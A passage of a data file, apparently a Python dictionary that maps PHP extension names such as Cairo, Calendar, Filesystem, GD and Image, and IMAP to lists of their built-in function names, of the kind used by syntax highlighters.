'cubrid_lob2_write',
'cubrid_lock_read',
'cubrid_lock_write',
'cubrid_move_cursor',
'cubrid_next_result',
'cubrid_num_cols',
'cubrid_num_rows',
'cubrid_pconnect_with_url',
'cubrid_pconnect',
'cubrid_prepare',
'cubrid_put',
'cubrid_rollback',
'cubrid_schema',
'cubrid_seq_drop',
'cubrid_seq_insert',
'cubrid_seq_put',
'cubrid_set_add',
'cubrid_set_autocommit',
'cubrid_set_db_parameter',
'cubrid_set_drop',
'cubrid_set_query_timeout',
'cubrid_version'],
'Cairo': ['cairo_create',
'cairo_font_face_get_type',
'cairo_font_face_status',
'cairo_font_options_create',
'cairo_font_options_equal',
'cairo_font_options_get_antialias',
'cairo_font_options_get_hint_metrics',
'cairo_font_options_get_hint_style',
'cairo_font_options_get_subpixel_order',
'cairo_font_options_hash',
'cairo_font_options_merge',
'cairo_font_options_set_antialias',
'cairo_font_options_set_hint_metrics',
'cairo_font_options_set_hint_style',
'cairo_font_options_set_subpixel_order',
'cairo_font_options_status',
'cairo_format_stride_for_width',
'cairo_image_surface_create_for_data',
'cairo_image_surface_create_from_png',
'cairo_image_surface_create',
'cairo_image_surface_get_data',
'cairo_image_surface_get_format',
'cairo_image_surface_get_height',
'cairo_image_surface_get_stride',
'cairo_image_surface_get_width',
'cairo_matrix_create_scale',
'cairo_matrix_create_translate',
'cairo_matrix_invert',
'cairo_matrix_multiply',
'cairo_matrix_rotate',
'cairo_matrix_transform_distance',
'cairo_matrix_transform_point',
'cairo_matrix_translate',
'cairo_pattern_add_color_stop_rgb',
'cairo_pattern_add_color_stop_rgba',
'cairo_pattern_create_for_surface',
'cairo_pattern_create_linear',
'cairo_pattern_create_radial',
'cairo_pattern_create_rgb',
'cairo_pattern_create_rgba',
'cairo_pattern_get_color_stop_count',
'cairo_pattern_get_color_stop_rgba',
'cairo_pattern_get_extend',
'cairo_pattern_get_filter',
'cairo_pattern_get_linear_points',
'cairo_pattern_get_matrix',
'cairo_pattern_get_radial_circles',
'cairo_pattern_get_rgba',
'cairo_pattern_get_surface',
'cairo_pattern_get_type',
'cairo_pattern_set_extend',
'cairo_pattern_set_filter',
'cairo_pattern_set_matrix',
'cairo_pattern_status',
'cairo_pdf_surface_create',
'cairo_pdf_surface_set_size',
'cairo_ps_get_levels',
'cairo_ps_level_to_string',
'cairo_ps_surface_create',
'cairo_ps_surface_dsc_begin_page_setup',
'cairo_ps_surface_dsc_begin_setup',
'cairo_ps_surface_dsc_comment',
'cairo_ps_surface_get_eps',
'cairo_ps_surface_restrict_to_level',
'cairo_ps_surface_set_eps',
'cairo_ps_surface_set_size',
'cairo_scaled_font_create',
'cairo_scaled_font_extents',
'cairo_scaled_font_get_ctm',
'cairo_scaled_font_get_font_face',
'cairo_scaled_font_get_font_matrix',
'cairo_scaled_font_get_font_options',
'cairo_scaled_font_get_scale_matrix',
'cairo_scaled_font_get_type',
'cairo_scaled_font_glyph_extents',
'cairo_scaled_font_status',
'cairo_scaled_font_text_extents',
'cairo_surface_copy_page',
'cairo_surface_create_similar',
'cairo_surface_finish',
'cairo_surface_flush',
'cairo_surface_get_content',
'cairo_surface_get_device_offset',
'cairo_surface_get_font_options',
'cairo_surface_get_type',
'cairo_surface_mark_dirty_rectangle',
'cairo_surface_mark_dirty',
'cairo_surface_set_device_offset',
'cairo_surface_set_fallback_resolution',
'cairo_surface_show_page',
'cairo_surface_status',
'cairo_surface_write_to_png',
'cairo_svg_surface_create',
'cairo_svg_surface_restrict_to_version',
'cairo_svg_version_to_string'],
'Calendar': ['cal_days_in_month',
'cal_from_jd',
'cal_info',
'cal_to_jd',
'easter_date',
'easter_days',
'FrenchToJD',
'GregorianToJD',
'JDDayOfWeek',
'JDMonthName',
'JDToFrench',
'JDToGregorian',
'jdtojewish',
'JDToJulian',
'jdtounix',
'JewishToJD',
'JulianToJD',
'unixtojd'],
'Classes/Object': ['__autoload',
'call_user_method_array',
'call_user_method',
'class_alias',
'class_exists',
'get_called_class',
'get_class_methods',
'get_class_vars',
'get_class',
'get_declared_classes',
'get_declared_interfaces',
'get_declared_traits',
'get_object_vars',
'get_parent_class',
'interface_exists',
'is_a',
'is_subclass_of',
'method_exists',
'property_exists',
'trait_exists'],
'Classkit': ['classkit_import',
'classkit_method_add',
'classkit_method_copy',
'classkit_method_redefine',
'classkit_method_remove',
'classkit_method_rename'],
'Crack': ['crack_check',
'crack_closedict',
'crack_getlastmessage',
'crack_opendict'],
'Ctype': ['ctype_alnum',
'ctype_alpha',
'ctype_cntrl',
'ctype_digit',
'ctype_graph',
'ctype_lower',
'ctype_print',
'ctype_punct',
'ctype_space',
'ctype_upper',
'ctype_xdigit'],
'Cyrus': ['cyrus_authenticate',
'cyrus_bind',
'cyrus_close',
'cyrus_connect',
'cyrus_query',
'cyrus_unbind'],
'DB++': ['dbplus_add',
'dbplus_aql',
'dbplus_chdir',
'dbplus_close',
'dbplus_curr',
'dbplus_errcode',
'dbplus_errno',
'dbplus_find',
'dbplus_first',
'dbplus_flush',
'dbplus_freealllocks',
'dbplus_freelock',
'dbplus_freerlocks',
'dbplus_getlock',
'dbplus_getunique',
'dbplus_info',
'dbplus_last',
'dbplus_lockrel',
'dbplus_next',
'dbplus_open',
'dbplus_prev',
'dbplus_rchperm',
'dbplus_rcreate',
'dbplus_rcrtexact',
'dbplus_rcrtlike',
'dbplus_resolve',
'dbplus_restorepos',
'dbplus_rkeys',
'dbplus_ropen',
'dbplus_rquery',
'dbplus_rrename',
'dbplus_rsecindex',
'dbplus_runlink',
'dbplus_rzap',
'dbplus_savepos',
'dbplus_setindex',
'dbplus_setindexbynumber',
'dbplus_sql',
'dbplus_tcl',
'dbplus_tremove',
'dbplus_undo',
'dbplus_undoprepare',
'dbplus_unlockrel',
'dbplus_unselect',
'dbplus_update',
'dbplus_xlockrel',
'dbplus_xunlockrel'],
'DBA': ['dba_close',
'dba_delete',
'dba_exists',
'dba_fetch',
'dba_firstkey',
'dba_handlers',
'dba_insert',
'dba_key_split',
'dba_list',
'dba_nextkey',
'dba_open',
'dba_optimize',
'dba_popen',
'dba_replace',
'dba_sync'],
'DOM': ['dom_import_simplexml'],
'Date/Time': ['checkdate',
'date_add',
'date_create_from_format',
'date_create_immutable_from_format',
'date_create_immutable',
'date_create',
'date_date_set',
'date_default_timezone_get',
'date_default_timezone_set',
'date_diff',
'date_format',
'date_get_last_errors',
'date_interval_create_from_date_string',
'date_interval_format',
'date_isodate_set',
'date_modify',
'date_offset_get',
'date_parse_from_format',
'date_parse',
'date_sub',
'date_sun_info',
'date_sunrise',
'date_sunset',
'date_time_set',
'date_timestamp_get',
'date_timestamp_set',
'date_timezone_get',
'date_timezone_set',
'date',
'getdate',
'gettimeofday',
'gmdate',
'gmmktime',
'gmstrftime',
'idate',
'localtime',
'microtime',
'mktime',
'strftime',
'strptime',
'strtotime',
'time',
'timezone_abbreviations_list',
'timezone_identifiers_list',
'timezone_location_get',
'timezone_name_from_abbr',
'timezone_name_get',
'timezone_offset_get',
'timezone_open',
'timezone_transitions_get',
'timezone_version_get'],
'Direct IO': ['dio_close',
'dio_fcntl',
'dio_open',
'dio_read',
'dio_seek',
'dio_stat',
'dio_tcsetattr',
'dio_truncate',
'dio_write'],
'Directory': ['chdir',
'chroot',
'closedir',
'dir',
'getcwd',
'opendir',
'readdir',
'rewinddir',
'scandir'],
'Eio': ['eio_busy',
'eio_cancel',
'eio_chmod',
'eio_chown',
'eio_close',
'eio_custom',
'eio_dup2',
'eio_event_loop',
'eio_fallocate',
'eio_fchmod',
'eio_fchown',
'eio_fdatasync',
'eio_fstat',
'eio_fstatvfs',
'eio_fsync',
'eio_ftruncate',
'eio_futime',
'eio_get_event_stream',
'eio_get_last_error',
'eio_grp_add',
'eio_grp_cancel',
'eio_grp_limit',
'eio_grp',
'eio_init',
'eio_link',
'eio_lstat',
'eio_mkdir',
'eio_mknod',
'eio_nop',
'eio_npending',
'eio_nready',
'eio_nreqs',
'eio_nthreads',
'eio_open',
'eio_poll',
'eio_read',
'eio_readahead',
'eio_readdir',
'eio_readlink',
'eio_realpath',
'eio_rename',
'eio_rmdir',
'eio_seek',
'eio_sendfile',
'eio_set_max_idle',
'eio_set_max_parallel',
'eio_set_max_poll_reqs',
'eio_set_max_poll_time',
'eio_set_min_parallel',
'eio_stat',
'eio_statvfs',
'eio_symlink',
'eio_sync_file_range',
'eio_sync',
'eio_syncfs',
'eio_truncate',
'eio_unlink',
'eio_utime',
'eio_write'],
'Enchant': ['enchant_broker_describe',
'enchant_broker_dict_exists',
'enchant_broker_free_dict',
'enchant_broker_free',
'enchant_broker_get_error',
'enchant_broker_init',
'enchant_broker_list_dicts',
'enchant_broker_request_dict',
'enchant_broker_request_pwl_dict',
'enchant_broker_set_ordering',
'enchant_dict_add_to_personal',
'enchant_dict_add_to_session',
'enchant_dict_check',
'enchant_dict_describe',
'enchant_dict_get_error',
'enchant_dict_is_in_session',
'enchant_dict_quick_check',
'enchant_dict_store_replacement',
'enchant_dict_suggest'],
'Error Handling': ['debug_backtrace',
'debug_print_backtrace',
'error_get_last',
'error_log',
'error_reporting',
'restore_error_handler',
'restore_exception_handler',
'set_error_handler',
'set_exception_handler',
'trigger_error',
'user_error'],
'Exif': ['exif_imagetype',
'exif_read_data',
'exif_tagname',
'exif_thumbnail',
'read_exif_data'],
'Expect': ['expect_expectl', 'expect_popen'],
'FAM': ['fam_cancel_monitor',
'fam_close',
'fam_monitor_collection',
'fam_monitor_directory',
'fam_monitor_file',
'fam_next_event',
'fam_open',
'fam_pending',
'fam_resume_monitor',
'fam_suspend_monitor'],
'FDF': ['fdf_add_doc_javascript',
'fdf_add_template',
'fdf_close',
'fdf_create',
'fdf_enum_values',
'fdf_errno',
'fdf_error',
'fdf_get_ap',
'fdf_get_attachment',
'fdf_get_encoding',
'fdf_get_file',
'fdf_get_flags',
'fdf_get_opt',
'fdf_get_status',
'fdf_get_value',
'fdf_get_version',
'fdf_header',
'fdf_next_field_name',
'fdf_open_string',
'fdf_open',
'fdf_remove_item',
'fdf_save_string',
'fdf_save',
'fdf_set_ap',
'fdf_set_encoding',
'fdf_set_file',
'fdf_set_flags',
'fdf_set_javascript_action',
'fdf_set_on_import_javascript',
'fdf_set_opt',
'fdf_set_status',
'fdf_set_submit_form_action',
'fdf_set_target_frame',
'fdf_set_value',
'fdf_set_version'],
'FPM': ['fastcgi_finish_request'],
'FTP': ['ftp_alloc',
'ftp_cdup',
'ftp_chdir',
'ftp_chmod',
'ftp_close',
'ftp_connect',
'ftp_delete',
'ftp_exec',
'ftp_fget',
'ftp_fput',
'ftp_get_option',
'ftp_get',
'ftp_login',
'ftp_mdtm',
'ftp_mkdir',
'ftp_nb_continue',
'ftp_nb_fget',
'ftp_nb_fput',
'ftp_nb_get',
'ftp_nb_put',
'ftp_nlist',
'ftp_pasv',
'ftp_put',
'ftp_pwd',
'ftp_quit',
'ftp_raw',
'ftp_rawlist',
'ftp_rename',
'ftp_rmdir',
'ftp_set_option',
'ftp_site',
'ftp_size',
'ftp_ssl_connect',
'ftp_systype'],
'Fann': ['fann_cascadetrain_on_data',
'fann_cascadetrain_on_file',
'fann_clear_scaling_params',
'fann_copy',
'fann_create_from_file',
'fann_create_shortcut_array',
'fann_create_shortcut',
'fann_create_sparse_array',
'fann_create_sparse',
'fann_create_standard_array',
'fann_create_standard',
'fann_create_train_from_callback',
'fann_create_train',
'fann_descale_input',
'fann_descale_output',
'fann_descale_train',
'fann_destroy_train',
'fann_destroy',
'fann_duplicate_train_data',
'fann_get_activation_function',
'fann_get_activation_steepness',
'fann_get_bias_array',
'fann_get_bit_fail_limit',
'fann_get_bit_fail',
'fann_get_cascade_activation_functions_count',
'fann_get_cascade_activation_functions',
'fann_get_cascade_activation_steepnesses_count',
'fann_get_cascade_activation_steepnesses',
'fann_get_cascade_candidate_change_fraction',
'fann_get_cascade_candidate_limit',
'fann_get_cascade_candidate_stagnation_epochs',
'fann_get_cascade_max_cand_epochs',
'fann_get_cascade_max_out_epochs',
'fann_get_cascade_min_cand_epochs',
'fann_get_cascade_min_out_epochs',
'fann_get_cascade_num_candidate_groups',
'fann_get_cascade_num_candidates',
'fann_get_cascade_output_change_fraction',
'fann_get_cascade_output_stagnation_epochs',
'fann_get_cascade_weight_multiplier',
'fann_get_connection_array',
'fann_get_connection_rate',
'fann_get_errno',
'fann_get_errstr',
'fann_get_layer_array',
'fann_get_learning_momentum',
'fann_get_learning_rate',
'fann_get_MSE',
'fann_get_network_type',
'fann_get_num_input',
'fann_get_num_layers',
'fann_get_num_output',
'fann_get_quickprop_decay',
'fann_get_quickprop_mu',
'fann_get_rprop_decrease_factor',
'fann_get_rprop_delta_max',
'fann_get_rprop_delta_min',
'fann_get_rprop_delta_zero',
'fann_get_rprop_increase_factor',
'fann_get_sarprop_step_error_shift',
'fann_get_sarprop_step_error_threshold_factor',
'fann_get_sarprop_temperature',
'fann_get_sarprop_weight_decay_shift',
'fann_get_total_connections',
'fann_get_total_neurons',
'fann_get_train_error_function',
'fann_get_train_stop_function',
'fann_get_training_algorithm',
'fann_init_weights',
'fann_length_train_data',
'fann_merge_train_data',
'fann_num_input_train_data',
'fann_num_output_train_data',
'fann_print_error',
'fann_randomize_weights',
'fann_read_train_from_file',
'fann_reset_errno',
'fann_reset_errstr',
'fann_reset_MSE',
'fann_run',
'fann_save_train',
'fann_save',
'fann_scale_input_train_data',
'fann_scale_input',
'fann_scale_output_train_data',
'fann_scale_output',
'fann_scale_train_data',
'fann_scale_train',
'fann_set_activation_function_hidden',
'fann_set_activation_function_layer',
'fann_set_activation_function_output',
'fann_set_activation_function',
'fann_set_activation_steepness_hidden',
'fann_set_activation_steepness_layer',
'fann_set_activation_steepness_output',
'fann_set_activation_steepness',
'fann_set_bit_fail_limit',
'fann_set_callback',
'fann_set_cascade_activation_functions',
'fann_set_cascade_activation_steepnesses',
'fann_set_cascade_candidate_change_fraction',
'fann_set_cascade_candidate_limit',
'fann_set_cascade_candidate_stagnation_epochs',
'fann_set_cascade_max_cand_epochs',
'fann_set_cascade_max_out_epochs',
'fann_set_cascade_min_cand_epochs',
'fann_set_cascade_min_out_epochs',
'fann_set_cascade_num_candidate_groups',
'fann_set_cascade_output_change_fraction',
'fann_set_cascade_output_stagnation_epochs',
'fann_set_cascade_weight_multiplier',
'fann_set_error_log',
'fann_set_input_scaling_params',
'fann_set_learning_momentum',
'fann_set_learning_rate',
'fann_set_output_scaling_params',
'fann_set_quickprop_decay',
'fann_set_quickprop_mu',
'fann_set_rprop_decrease_factor',
'fann_set_rprop_delta_max',
'fann_set_rprop_delta_min',
'fann_set_rprop_delta_zero',
'fann_set_rprop_increase_factor',
'fann_set_sarprop_step_error_shift',
'fann_set_sarprop_step_error_threshold_factor',
'fann_set_sarprop_temperature',
'fann_set_sarprop_weight_decay_shift',
'fann_set_scaling_params',
'fann_set_train_error_function',
'fann_set_train_stop_function',
'fann_set_training_algorithm',
'fann_set_weight_array',
'fann_set_weight',
'fann_shuffle_train_data',
'fann_subset_train_data',
'fann_test_data',
'fann_test',
'fann_train_epoch',
'fann_train_on_data',
'fann_train_on_file',
'fann_train'],
'Fileinfo': ['finfo_buffer',
'finfo_close',
'finfo_file',
'finfo_open',
'finfo_set_flags',
'mime_content_type'],
'Filesystem': ['basename',
'chgrp',
'chmod',
'chown',
'clearstatcache',
'copy',
'dirname',
'disk_free_space',
'disk_total_space',
'diskfreespace',
'fclose',
'feof',
'fflush',
'fgetc',
'fgetcsv',
'fgets',
'fgetss',
'file_exists',
'file_get_contents',
'file_put_contents',
'file',
'fileatime',
'filectime',
'filegroup',
'fileinode',
'filemtime',
'fileowner',
'fileperms',
'filesize',
'filetype',
'flock',
'fnmatch',
'fopen',
'fpassthru',
'fputcsv',
'fputs',
'fread',
'fscanf',
'fseek',
'fstat',
'ftell',
'ftruncate',
'fwrite',
'glob',
'is_dir',
'is_executable',
'is_file',
'is_link',
'is_readable',
'is_uploaded_file',
'is_writable',
'is_writeable',
'lchgrp',
'lchown',
'link',
'linkinfo',
'lstat',
'mkdir',
'move_uploaded_file',
'parse_ini_file',
'parse_ini_string',
'pathinfo',
'pclose',
'popen',
'readfile',
'readlink',
'realpath_cache_get',
'realpath_cache_size',
'realpath',
'rename',
'rewind',
'rmdir',
'set_file_buffer',
'stat',
'symlink',
'tempnam',
'tmpfile',
'touch',
'umask',
'unlink'],
'Filter': ['filter_has_var',
'filter_id',
'filter_input_array',
'filter_input',
'filter_list',
'filter_var_array',
'filter_var'],
'Firebird/InterBase': ['ibase_add_user',
'ibase_affected_rows',
'ibase_backup',
'ibase_blob_add',
'ibase_blob_cancel',
'ibase_blob_close',
'ibase_blob_create',
'ibase_blob_echo',
'ibase_blob_get',
'ibase_blob_import',
'ibase_blob_info',
'ibase_blob_open',
'ibase_close',
'ibase_commit_ret',
'ibase_commit',
'ibase_connect',
'ibase_db_info',
'ibase_delete_user',
'ibase_drop_db',
'ibase_errcode',
'ibase_errmsg',
'ibase_execute',
'ibase_fetch_assoc',
'ibase_fetch_object',
'ibase_fetch_row',
'ibase_field_info',
'ibase_free_event_handler',
'ibase_free_query',
'ibase_free_result',
'ibase_gen_id',
'ibase_maintain_db',
'ibase_modify_user',
'ibase_name_result',
'ibase_num_fields',
'ibase_num_params',
'ibase_param_info',
'ibase_pconnect',
'ibase_prepare',
'ibase_query',
'ibase_restore',
'ibase_rollback_ret',
'ibase_rollback',
'ibase_server_info',
'ibase_service_attach',
'ibase_service_detach',
'ibase_set_event_handler',
'ibase_trans',
'ibase_wait_event'],
'FriBiDi': ['fribidi_log2vis'],
'FrontBase': ['fbsql_affected_rows',
'fbsql_autocommit',
'fbsql_blob_size',
'fbsql_change_user',
'fbsql_clob_size',
'fbsql_close',
'fbsql_commit',
'fbsql_connect',
'fbsql_create_blob',
'fbsql_create_clob',
'fbsql_create_db',
'fbsql_data_seek',
'fbsql_database_password',
'fbsql_database',
'fbsql_db_query',
'fbsql_db_status',
'fbsql_drop_db',
'fbsql_errno',
'fbsql_error',
'fbsql_fetch_array',
'fbsql_fetch_assoc',
'fbsql_fetch_field',
'fbsql_fetch_lengths',
'fbsql_fetch_object',
'fbsql_fetch_row',
'fbsql_field_flags',
'fbsql_field_len',
'fbsql_field_name',
'fbsql_field_seek',
'fbsql_field_table',
'fbsql_field_type',
'fbsql_free_result',
'fbsql_get_autostart_info',
'fbsql_hostname',
'fbsql_insert_id',
'fbsql_list_dbs',
'fbsql_list_fields',
'fbsql_list_tables',
'fbsql_next_result',
'fbsql_num_fields',
'fbsql_num_rows',
'fbsql_password',
'fbsql_pconnect',
'fbsql_query',
'fbsql_read_blob',
'fbsql_read_clob',
'fbsql_result',
'fbsql_rollback',
'fbsql_rows_fetched',
'fbsql_select_db',
'fbsql_set_characterset',
'fbsql_set_lob_mode',
'fbsql_set_password',
'fbsql_set_transaction',
'fbsql_start_db',
'fbsql_stop_db',
'fbsql_table_name',
'fbsql_tablename',
'fbsql_username',
'fbsql_warnings'],
'Function handling': ['call_user_func_array',
'call_user_func',
'create_function',
'forward_static_call_array',
'forward_static_call',
'func_get_arg',
'func_get_args',
'func_num_args',
'function_exists',
'get_defined_functions',
'register_shutdown_function',
'register_tick_function',
'unregister_tick_function'],
'GD and Image': ['gd_info',
'getimagesize',
'getimagesizefromstring',
'image_type_to_extension',
'image_type_to_mime_type',
'image2wbmp',
'imageaffine',
'imageaffinematrixconcat',
'imageaffinematrixget',
'imagealphablending',
'imageantialias',
'imagearc',
'imagechar',
'imagecharup',
'imagecolorallocate',
'imagecolorallocatealpha',
'imagecolorat',
'imagecolorclosest',
'imagecolorclosestalpha',
'imagecolorclosesthwb',
'imagecolordeallocate',
'imagecolorexact',
'imagecolorexactalpha',
'imagecolormatch',
'imagecolorresolve',
'imagecolorresolvealpha',
'imagecolorset',
'imagecolorsforindex',
'imagecolorstotal',
'imagecolortransparent',
'imageconvolution',
'imagecopy',
'imagecopymerge',
'imagecopymergegray',
'imagecopyresampled',
'imagecopyresized',
'imagecreate',
'imagecreatefromgd2',
'imagecreatefromgd2part',
'imagecreatefromgd',
'imagecreatefromgif',
'imagecreatefromjpeg',
'imagecreatefrompng',
'imagecreatefromstring',
'imagecreatefromwbmp',
'imagecreatefromwebp',
'imagecreatefromxbm',
'imagecreatefromxpm',
'imagecreatetruecolor',
'imagecrop',
'imagecropauto',
'imagedashedline',
'imagedestroy',
'imageellipse',
'imagefill',
'imagefilledarc',
'imagefilledellipse',
'imagefilledpolygon',
'imagefilledrectangle',
'imagefilltoborder',
'imagefilter',
'imageflip',
'imagefontheight',
'imagefontwidth',
'imageftbbox',
'imagefttext',
'imagegammacorrect',
'imagegd2',
'imagegd',
'imagegif',
'imagegrabscreen',
'imagegrabwindow',
'imageinterlace',
'imageistruecolor',
'imagejpeg',
'imagelayereffect',
'imageline',
'imageloadfont',
'imagepalettecopy',
'imagepalettetotruecolor',
'imagepng',
'imagepolygon',
'imagepsbbox',
'imagepsencodefont',
'imagepsextendfont',
'imagepsfreefont',
'imagepsloadfont',
'imagepsslantfont',
'imagepstext',
'imagerectangle',
'imagerotate',
'imagesavealpha',
'imagescale',
'imagesetbrush',
'imagesetinterpolation',
'imagesetpixel',
'imagesetstyle',
'imagesetthickness',
'imagesettile',
'imagestring',
'imagestringup',
'imagesx',
'imagesy',
'imagetruecolortopalette',
'imagettfbbox',
'imagettftext',
'imagetypes',
'imagewbmp',
'imagewebp',
'imagexbm',
'iptcembed',
'iptcparse',
'jpeg2wbmp',
'png2wbmp'],
'GMP': ['gmp_abs',
'gmp_add',
'gmp_and',
'gmp_clrbit',
'gmp_cmp',
'gmp_com',
'gmp_div_q',
'gmp_div_qr',
'gmp_div_r',
'gmp_div',
'gmp_divexact',
'gmp_fact',
'gmp_gcd',
'gmp_gcdext',
'gmp_hamdist',
'gmp_init',
'gmp_intval',
'gmp_invert',
'gmp_jacobi',
'gmp_legendre',
'gmp_mod',
'gmp_mul',
'gmp_neg',
'gmp_nextprime',
'gmp_or',
'gmp_perfect_square',
'gmp_popcount',
'gmp_pow',
'gmp_powm',
'gmp_prob_prime',
'gmp_random',
'gmp_scan0',
'gmp_scan1',
'gmp_setbit',
'gmp_sign',
'gmp_sqrt',
'gmp_sqrtrem',
'gmp_strval',
'gmp_sub',
'gmp_testbit',
'gmp_xor'],
'GeoIP': ['geoip_asnum_by_name',
'geoip_continent_code_by_name',
'geoip_country_code_by_name',
'geoip_country_code3_by_name',
'geoip_country_name_by_name',
'geoip_database_info',
'geoip_db_avail',
'geoip_db_filename',
'geoip_db_get_all_info',
'geoip_domain_by_name',
'geoip_id_by_name',
'geoip_isp_by_name',
'geoip_netspeedcell_by_name',
'geoip_org_by_name',
'geoip_record_by_name',
'geoip_region_by_name',
'geoip_region_name_by_code',
'geoip_setup_custom_directory',
'geoip_time_zone_by_country_and_region'],
'Gettext': ['bind_textdomain_codeset',
'bindtextdomain',
'dcgettext',
'dcngettext',
'dgettext',
'dngettext',
'gettext',
'ngettext',
'textdomain'],
'GnuPG': ['gnupg_adddecryptkey',
'gnupg_addencryptkey',
'gnupg_addsignkey',
'gnupg_cleardecryptkeys',
'gnupg_clearencryptkeys',
'gnupg_clearsignkeys',
'gnupg_decrypt',
'gnupg_decryptverify',
'gnupg_encrypt',
'gnupg_encryptsign',
'gnupg_export',
'gnupg_geterror',
'gnupg_getprotocol',
'gnupg_import',
'gnupg_init',
'gnupg_keyinfo',
'gnupg_setarmor',
'gnupg_seterrormode',
'gnupg_setsignmode',
'gnupg_sign',
'gnupg_verify'],
'Gopher': ['gopher_parsedir'],
'Grapheme': ['grapheme_extract',
'grapheme_stripos',
'grapheme_stristr',
'grapheme_strlen',
'grapheme_strpos',
'grapheme_strripos',
'grapheme_strrpos',
'grapheme_strstr',
'grapheme_substr'],
'Gupnp': ['gupnp_context_get_host_ip',
'gupnp_context_get_port',
'gupnp_context_get_subscription_timeout',
'gupnp_context_host_path',
'gupnp_context_new',
'gupnp_context_set_subscription_timeout',
'gupnp_context_timeout_add',
'gupnp_context_unhost_path',
'gupnp_control_point_browse_start',
'gupnp_control_point_browse_stop',
'gupnp_control_point_callback_set',
'gupnp_control_point_new',
'gupnp_device_action_callback_set',
'gupnp_device_info_get_service',
'gupnp_device_info_get',
'gupnp_root_device_get_available',
'gupnp_root_device_get_relative_location',
'gupnp_root_device_new',
'gupnp_root_device_set_available',
'gupnp_root_device_start',
'gupnp_root_device_stop',
'gupnp_service_action_get',
'gupnp_service_action_return_error',
'gupnp_service_action_return',
'gupnp_service_action_set',
'gupnp_service_freeze_notify',
'gupnp_service_info_get_introspection',
'gupnp_service_info_get',
'gupnp_service_introspection_get_state_variable',
'gupnp_service_notify',
'gupnp_service_proxy_action_get',
'gupnp_service_proxy_action_set',
'gupnp_service_proxy_add_notify',
'gupnp_service_proxy_callback_set',
'gupnp_service_proxy_get_subscribed',
'gupnp_service_proxy_remove_notify',
'gupnp_service_proxy_set_subscribed',
'gupnp_service_thaw_notify'],
'HTTP': ['http_cache_etag',
'http_cache_last_modified',
'http_chunked_decode',
'http_deflate',
'http_inflate',
'http_build_cookie',
'http_date',
'http_get_request_body_stream',
'http_get_request_body',
'http_get_request_headers',
'http_match_etag',
'http_match_modified',
'http_match_request_header',
'http_support',
'http_negotiate_charset',
'http_negotiate_content_type',
'http_negotiate_language',
'ob_deflatehandler',
'ob_etaghandler',
'ob_inflatehandler',
'http_parse_cookie',
'http_parse_headers',
'http_parse_message',
'http_parse_params',
'http_persistent_handles_clean',
'http_persistent_handles_count',
'http_persistent_handles_ident',
'http_get',
'http_head',
'http_post_data',
'http_post_fields',
'http_put_data',
'http_put_file',
'http_put_stream',
'http_request_body_encode',
'http_request_method_exists',
'http_request_method_name',
'http_request_method_register',
'http_request_method_unregister',
'http_request',
'http_redirect',
'http_send_content_disposition',
'http_send_content_type',
'http_send_data',
'http_send_file',
'http_send_last_modified',
'http_send_status',
'http_send_stream',
'http_throttle',
'http_build_str',
'http_build_url'],
'Hash': ['hash_algos',
'hash_copy',
'hash_file',
'hash_final',
'hash_hmac_file',
'hash_hmac',
'hash_init',
'hash_pbkdf2',
'hash_update_file',
'hash_update_stream',
'hash_update',
'hash'],
'Hyperwave': ['hw_Array2Objrec',
'hw_changeobject',
'hw_Children',
'hw_ChildrenObj',
'hw_Close',
'hw_Connect',
'hw_connection_info',
'hw_cp',
'hw_Deleteobject',
'hw_DocByAnchor',
'hw_DocByAnchorObj',
'hw_Document_Attributes',
'hw_Document_BodyTag',
'hw_Document_Content',
'hw_Document_SetContent',
'hw_Document_Size',
'hw_dummy',
'hw_EditText',
'hw_Error',
'hw_ErrorMsg',
'hw_Free_Document',
'hw_GetAnchors',
'hw_GetAnchorsObj',
'hw_GetAndLock',
'hw_GetChildColl',
'hw_GetChildCollObj',
'hw_GetChildDocColl',
'hw_GetChildDocCollObj',
'hw_GetObject',
'hw_GetObjectByQuery',
'hw_GetObjectByQueryColl',
'hw_GetObjectByQueryCollObj',
'hw_GetObjectByQueryObj',
'hw_GetParents',
'hw_GetParentsObj',
'hw_getrellink',
'hw_GetRemote',
'hw_getremotechildren',
'hw_GetSrcByDestObj',
'hw_GetText',
'hw_getusername',
'hw_Identify',
'hw_InCollections',
'hw_Info',
'hw_InsColl',
'hw_InsDoc',
'hw_insertanchors',
'hw_InsertDocument',
'hw_InsertObject',
'hw_mapid',
'hw_Modifyobject',
'hw_mv',
'hw_New_Document',
'hw_objrec2array',
'hw_Output_Document',
'hw_pConnect',
'hw_PipeDocument',
'hw_Root',
'hw_setlinkroot',
'hw_stat',
'hw_Unlock',
'hw_Who'],
'Hyperwave API': ['hwapi_attribute_new',
'hwapi_content_new',
'hwapi_hgcsp',
'hwapi_object_new'],
'IBM DB2': ['db2_autocommit',
'db2_bind_param',
'db2_client_info',
'db2_close',
'db2_column_privileges',
'db2_columns',
'db2_commit',
'db2_conn_error',
'db2_conn_errormsg',
'db2_connect',
'db2_cursor_type',
'db2_escape_string',
'db2_exec',
'db2_execute',
'db2_fetch_array',
'db2_fetch_assoc',
'db2_fetch_both',
'db2_fetch_object',
'db2_fetch_row',
'db2_field_display_size',
'db2_field_name',
'db2_field_num',
'db2_field_precision',
'db2_field_scale',
'db2_field_type',
'db2_field_width',
'db2_foreign_keys',
'db2_free_result',
'db2_free_stmt',
'db2_get_option',
'db2_last_insert_id',
'db2_lob_read',
'db2_next_result',
'db2_num_fields',
'db2_num_rows',
'db2_pclose',
'db2_pconnect',
'db2_prepare',
'db2_primary_keys',
'db2_procedure_columns',
'db2_procedures',
'db2_result',
'db2_rollback',
'db2_server_info',
'db2_set_option',
'db2_special_columns',
'db2_statistics',
'db2_stmt_error',
'db2_stmt_errormsg',
'db2_table_privileges',
'db2_tables'],
'ID3': ['id3_get_frame_long_name',
'id3_get_frame_short_name',
'id3_get_genre_id',
'id3_get_genre_list',
'id3_get_genre_name',
'id3_get_tag',
'id3_get_version',
'id3_remove_tag',
'id3_set_tag'],
'IDN': ['grapheme_substr', 'idn_to_ascii', 'idn_to_unicode', 'idn_to_utf8'],
'IIS': ['iis_add_server',
'iis_get_dir_security',
'iis_get_script_map',
'iis_get_server_by_comment',
'iis_get_server_by_path',
'iis_get_server_rights',
'iis_get_service_state',
'iis_remove_server',
'iis_set_app_settings',
'iis_set_dir_security',
'iis_set_script_map',
'iis_set_server_rights',
'iis_start_server',
'iis_start_service',
'iis_stop_server',
'iis_stop_service'],
'IMAP': ['imap_8bit',
'imap_alerts',
'imap_append',
'imap_base64',
'imap_binary',
'imap_body',
'imap_bodystruct',
'imap_check',
'imap_clearflag_full',
'imap_close',
'imap_create',
'imap_createmailbox',
'imap_delete',
'imap_deletemailbox',
